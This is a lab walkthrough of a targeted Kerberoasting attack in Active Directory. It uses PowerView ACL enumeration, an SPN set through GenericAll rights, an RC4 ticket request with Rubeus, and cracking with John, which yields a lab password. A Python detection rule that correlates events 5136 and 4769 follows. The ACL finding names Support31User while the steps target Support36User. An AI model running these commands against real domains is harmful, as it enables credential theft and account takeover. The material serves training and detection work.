Enumerating Interesting ACLs for student users

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}

Notice that StudentUsers has GenericAll permissions on Support31User

Now let’s set an SPN on Support36User

Set-DomainObject -Identity support36user -Set @{serviceprincipalname="us/myspn36"}

Now let’s check whether the user has an SPN set

Get-DomainUser -Identity support36user | select samaccountname,serviceprincipalname

Great, the user now has an SPN set

Let’s request the hash using Rubeus

.\Rubeus.exe kerberoast /user:support36user /simple /rc4opsec

Now let’s crack the hash using John

john crackme.txt --wordlist=/usr/share/wordlists/10k-worst-pass.txt

Amazing!

username: support36user
password: Desk@123
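
Seen from the defending side, the steps above leave two log records: a directory change that adds servicePrincipalName to a user object (event 5136) and an RC4 service ticket request for that same account (event 4769). The Python example below is added here and is not part of the original notes; it correlates the two over constructed sample events. The domain example.local, the account names studentuser1, legacysvc, appuser and helpdesk, and the timestamps are assumptions.

```python
from datetime import datetime, timedelta

RC4_HMAC = "0x17"         # TicketEncryptionType for RC4 in event 4769
VALUE_ADDED = "%%14674"   # OperationType "Value Added" in event 5136

# Constructed sample events, already parsed into dicts (not taken from the lab).
EVENTS = [
    {"id": 5136, "time": "2024-01-01T10:00:00", "SubjectUserName": "studentuser1",
     "ObjectDN": "CN=support36user,CN=Users,DC=example,DC=local",
     "ObjectClass": "user", "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "us/myspn36", "OperationType": VALUE_ADDED},
    {"id": 4769, "time": "2024-01-01T10:02:00", "ServiceName": "support36user",
     "TargetUserName": "studentuser1@EXAMPLE.LOCAL", "TicketEncryptionType": "0x17"},
    # RC4 ticket for an account whose SPN was not just added: no alert.
    {"id": 4769, "time": "2024-01-01T10:05:00", "ServiceName": "legacysvc",
     "TargetUserName": "appuser@EXAMPLE.LOCAL", "TicketEncryptionType": "0x17"},
    # AES ticket for the freshly modified account: no alert from this rule.
    {"id": 4769, "time": "2024-01-01T10:06:00", "ServiceName": "support36user",
     "TargetUserName": "helpdesk@EXAMPLE.LOCAL", "TicketEncryptionType": "0x12"},
]

def account_from_dn(dn):
    # Assumption: the CN equals the sAMAccountName; resolve the DN in production.
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def find_targeted_kerberoast(events, window=timedelta(hours=24)):
    """Flag RC4 ticket requests for user accounts that gained an SPN recently."""
    spn_added, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 5136 and ev["ObjectClass"] == "user"
                and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                and ev["OperationType"] == VALUE_ADDED):
            spn_added[account_from_dn(ev["ObjectDN"])] = (when, ev)
        elif ev["id"] == 4769 and ev["TicketEncryptionType"].lower() == RC4_HMAC:
            hit = spn_added.get(ev["ServiceName"].lower())
            if hit and timedelta(0) <= when - hit[0] <= window:
                alerts.append({"account": ev["ServiceName"].lower(),
                               "spn": hit[1]["AttributeValue"],
                               "modified_by": hit[1]["SubjectUserName"],
                               "requested_by": ev["TargetUserName"],
                               "delay_s": int((when - hit[0]).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_targeted_kerberoast(EVENTS):
        print(alert)
```

Event 5136 is only written when Directory Service Changes auditing is enabled and the object carries a matching SACL, so the first half of this correlation depends on that audit policy being in place.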